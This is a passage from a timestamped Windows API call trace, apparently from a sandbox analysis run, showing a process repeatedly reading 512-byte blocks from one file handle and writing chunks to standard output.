hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.158] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: 
lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.159] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.160] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.160] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 
[0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0174.161] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, 
lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile 
(in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 
[0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, 
lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, 